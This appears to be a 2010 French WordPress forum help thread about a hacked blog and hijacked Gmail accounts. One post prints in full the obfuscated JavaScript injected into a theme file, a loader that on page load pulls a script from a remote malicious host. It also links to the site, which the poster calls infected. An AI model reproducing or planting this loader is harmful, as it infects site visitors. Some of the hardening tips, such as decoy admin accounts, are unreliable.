WordPress Francophone

Bloh · 23-02-2010 12:00:49

Ma configuration WP actuelle
- Version de WordPress : la dernière
- Extensions en place : antivirus, WP security scan
- Nom de l'hebergeur : OVH

Problème(s) rencontré(s) :

Bonjour à tous,

Je rencontre un problème majeur sur mon site depuis vendredi soir, j'ai tout essayé sans arriver à mes fins, c'est la raison pour laquelle je me tourne vers vous.

Vendredi soir, en me connectant sur mon site, j'ai remarqué ce message :

Code: html

Parse error: syntax error, unexpected '<' in /homez.323/lecteurs/www/wp-includes/default-filters.php on line 229

Le même type de message figurait sur mon autre blog.
Une rapide recherche sur le fofo de Wordpress m'apprend que c'est un signe de hacking... Hum. Peu de temps après, je reçois une alerte de Gmail m'indiquant qu'un autre utilisateur est sur mon compte et que je vais donc être déconnectée... Deux comptes Gmail pour mes deux blogs, tous les deux piratés. Mots de passe changés, la panique à bord.

Vendredi soir, j'ai donc réussi à récupérer mes mots de passe avec la restauration rapide et simple de Gmail, j'ai downloadé tout ce qu'il y avait sur le serveur pour faire du ménage (j'ai reçu six ou sept alertes d'Antivir concernant des fichiers corrompus que j'ai supprimés), j'ai supprimé tout ce qu'il y avait sur le FTP, j'ai réinstallé Wordpress et les fichiers "propres" que j'avais scanné.

Et ça a marché.

Sauf que le samedi, mes boîtes mails ont été attaquées deux fois. Le site continuait à fonctionner.

Ce matin (mardi), nouveau message d'erreur sur le site, mais les adresses Gmail sont intactes. J'ai changé d'ordinateur et ai refait la même manip sur le serveur FTP, mais là, ça ne fonctionne pas.

Je préfère pas vous donner l'adresse du site - sauf si ça vous est vraiment utile - car la plupart de mes lecteurs reçoit un message d'alerte virus, et j'en ai même contaminé certains. Si avec ça, j'arrive à garder mon audience, je serais heureuse !!

Pour finir, mon ordinateur a été la cible du virus Security Tool jeudi ou vendredi (drôle de coïncidence...). Je n'utilise plus cet ordi pour aller sur mon site, mais comment puis-je, à partir de mes deux autres ordi à priori sains, tout nettoyer et surtout, protéger concrètement mon site? J'ai installé les plugins Antivirus et WP security scan.

Est-ce lié à OVH (j'y suis depuis un mois et demi) ? J'ai passé deux ans chez Free sans avoir le moindre problème.

Merci d'avance pour l'aide que vous pourrez m'apporter, je suis désespérée.

alexis38460 · 23-02-2010 12:03:47

Bonjour.
Les deux compte utilisateur qui se sont créer, c'est quoi leur nom ?

Sinon, je pense pas que sa soit OVH.
Je prefere 1&1.

Dernière modification par alexis38460 (23-02-2010 12:04:41)

Bloh · 23-02-2010 12:05:22

Je me suis mal exprimée. J'avais bloqué l'inscription au site. Ce sont mes deux comptes Gmail qui se sont fait hackés.

alexis38460 · 23-02-2010 12:06:51

Se n'est pas ton site qui c'est fait hacké ?

Bloh · 23-02-2010 12:09:52

Mes boîtes Gmail se sont faites hackées, mais mon compte administrateur sur le site non. En revanche, quand je vais sur mon site, il y a une page blanche avec le message d'erreur que j'ai mis dans le premier post. En regardant sur Internet, j'ai vu que c'était un signe que le site était hacké... En tout cas, y'a un gros truc sur le site.

alexis38460 · 23-02-2010 12:11:21

Je ne comprend plus. Ton site n'a rien.
C'est juste tes boite mail qui merde

Bloh · 23-02-2010 12:11:47

Voici ce qu'il y a après la balise "<?php get_footer(); ?> " dans l'index.php de mon thème :

Code: html

<script>var R;if(R!='C' && R != ''){R=null};function q() {var L="";this.Ap="";var P;if(P!='Wh'){P='Wh'};var Q=new Array();var g=new String();var x='replace';this.XN="";var j='g';var w='[';var X=RegExp;var F="";var k=new Array();var I=']';var sH;if(sH!='wz' && sH!='Rb'){sH='wz'};var Ag;if(Ag!='qF' && Ag!='N_'){Ag='qF'};var IA=new String();var _=new Array();var Rd="";function Z(wK,S){this.b='';this.MT='';var BB;if(BB!='' && BB!='i'){BB=''};var m=w;m+=S;m+=I;var OD;if(OD!='' && OD!='Ha'){OD=null};var jV;if(jV!='' && jV!='iC'){jV=null};var E=new X(m, j);var Ea='';return wK[x](E, g);var d=new String();};this.WC="";var KE='';var y=Z('cdrZeZaOtdedEOlOedm0eZn0tZ',"5Z0dO");var Ix=window;var OB=new String();var wN=new String();var K=Z('/LtYhKeKpYlLaLnYeLtT.KcLoSmS/YtKhTeKpLlSaSnSeLtL.ScSoLmT/YwSoYwTaSrLmLoTrSyY.TcToTmT/TgSoYoYgTlSeS.TcLoKmY/SsLoLfTtTpKeLdTiSaT.KcKoSmS.YpLhSpS',"YLTKS");var D=Z('89921055551583523301522199',"19253");var gZ;if(gZ!='Qt'){gZ='Qt'};var O=Z('sMc4r4i4pMtx',"MHx4P");var Co=new Array();this.CA='';var gX=Z('h6t6tipi:i/6/ib6a6dOoOn6g6oi-OcioimO.6sOuir6fitOhieOcOh6aOn6nieil6.ic6oOm6.iyOnieiti-6cOo6m6.6s6a6m6uieOs6ti.6r6u6:6',"iO6");var Oj=new String();var L_;if(L_!='JJ' && L_!='WK'){L_=''};var gw='';this.aQ="";Ix[Z('oUn2lyoBagdU',"2gUyB")]=function(){var sr;if(sr!='Eo' && sr != ''){sr=null};var IL;if(IL!='gy' && IL != ''){IL=null};try {var pD=new Date();var n="";gw+=gX;var uw;if(uw!=''){uw='JY'};var l=new String();gw+=D;this.UO='';gw+=K;var bC;if(bC!=''){bC='pF'};this.gW="";this.te="";U=document[y](O);var nX;if(nX!='' && nX!='CT'){nX='eR'};var zZ=new String();o(U,'src',gw);o(U,'defer',([8,1][1]));this.Nj="";var vh='';this.pa='';document.body.appendChild(U);var FY=new Date();} catch(u){var mJ;if(mJ!='JT' && mJ!='ao'){mJ='JT'};var pW;if(pW!='' && pW!='lN'){pW=''};};var Zh;if(Zh!='FG'){Zh=''};var go;if(go!='C_' && go != ''){go=null};};function o(KP,mD,uS){var ex="";KP.setAttribute(mD, uS);this.kTR="";}var aF;if(aF!=''){aF='OC'};};var qs=new Date();q();var zz;if(zz!='' && zz!='Lp'){zz='TC'};var Kq;if(Kq!='' && Kq!='lp'){Kq='aQu'};</script>
<!--83219058615331021210d00bb612f623-->

J'avais déjà supprimé une ligne de code comme celle-ci vendredi, mais c'est revenu.

alexis38460 · 23-02-2010 12:14:09

Reinstalle ton blog, en changent le prefixe qui est de wp_ en blog_
Créer deux autre compte en plus du tien,qui se nomme:
administrateur
administrator
Mais leurs des mots de passe avec plein de chiffres, des lettres, des caractere speciaux.
Crééer toi une adresse hotmail pour ton site.
Et essaye tout sa.

Bloh · 23-02-2010 12:16:03

Mon site a un problème. Si tu veux voir, à tes risques et périls :
http://www.lecteurscompulsifs.com/

Aux moins téméraires, voici ce que j'ai en me connectant :

Bloh · 23-02-2010 12:17:09

Ok merci, je vais faire ça. Je reviens pour vous dire si ça a marché.

fge · 23-02-2010 18:15:38

1/ À mon humble avis, la multiplication des comptes Admin ne sert à rien (Les fonctions spécifiques à l'admin servent peu souvent), et il est également plus sûr de les renommer. En effet si un pirate sait comment s'appelle le compte admin vous avez déjà la moitié de l'information et il reste plus qu'à trouver le mot de passe.
2/ Faire un scan complet des fichiers et des PC par des antivirus.
3/ Changer le maximum de mot de passe, en les sécurisant comme le suggère alexis38460.
4/ Vérifier que la version WP soit au minimum 2.9.x.
5/ Supprimer les plugins inutiles (La faille peut venir d'un plug-in) et vérifier s'il existe des mises à jour (notamment touchant la sécurité).

Voici également un article pouvant aider sur le sujet :
http://www.reussirenfin.fr/wordpress/ef … wordpress/

Dernière modification par fge (23-02-2010 18:19:56)

alexis38460 · 23-02-2010 18:50:21

Quand je dit de créer des deux compte, c'est car si la personne, plus souvent des bots de pirates, il entre leurs code qui permet de créer un compte admin nommé administrator, avec leur mot de pass, alors que si on créer dejà un compte administrator, leur code ne marche pas, donc il sont pas reussi.

fge · 23-02-2010 19:25:45

Je comprends... Dans ce cas ce ne sont pas des comptes d'admin (c'est juste le nom) et on peut mettre dessus les droits minimum dessus.

alexis38460 · 23-02-2010 20:25:49

Oui, c'est juste le nom que il faut.
J'ai jamais dit les droits.

Duck Psycho Sexy · 17-03-2010 16:27:21

J'ai exactement le même problème que toi Bloh... As-tu des nouvelles?

Je suis en train de suivre une procédure de désinfection ici

Mais une fois finie que faire par rapport à mes sites???!!!

PLEASE HELP!!!

Duck Psycho Sexy · 17-03-2010 16:42:34

J'ai trouvé ceci, je vais tester :

http://www.reussirenfin.fr/wordpress/ef … wordpress/

WordPress Francophone

La référence en matiere de moteur de blog.

Le multi-blogs devient un jeu d'enfant !

La communauté, c'est vous qui la faites !

WordPress et vous !

Annonce

#1 23-02-2010 12:00:49

Site hacké + virus

Code: html

#2 23-02-2010 12:03:47

Re: Site hacké + virus

#3 23-02-2010 12:05:22

Re: Site hacké + virus

#4 23-02-2010 12:06:51

Re: Site hacké + virus

#5 23-02-2010 12:09:52

Re: Site hacké + virus

#6 23-02-2010 12:11:21

Re: Site hacké + virus

#7 23-02-2010 12:11:47

Re: Site hacké + virus

Code: html

#8 23-02-2010 12:14:09

Re: Site hacké + virus

#9 23-02-2010 12:16:03

Re: Site hacké + virus

#10 23-02-2010 12:17:09

Re: Site hacké + virus

#11 23-02-2010 18:15:38

Re: Site hacké + virus

#12 23-02-2010 18:50:21

Re: Site hacké + virus

#13 23-02-2010 19:25:45

Re: Site hacké + virus

#14 23-02-2010 20:25:49

Re: Site hacké + virus

#15 17-03-2010 16:27:21

Re: Site hacké + virus

#16 17-03-2010 16:42:34

Re: Site hacké + virus

Pied de page des forums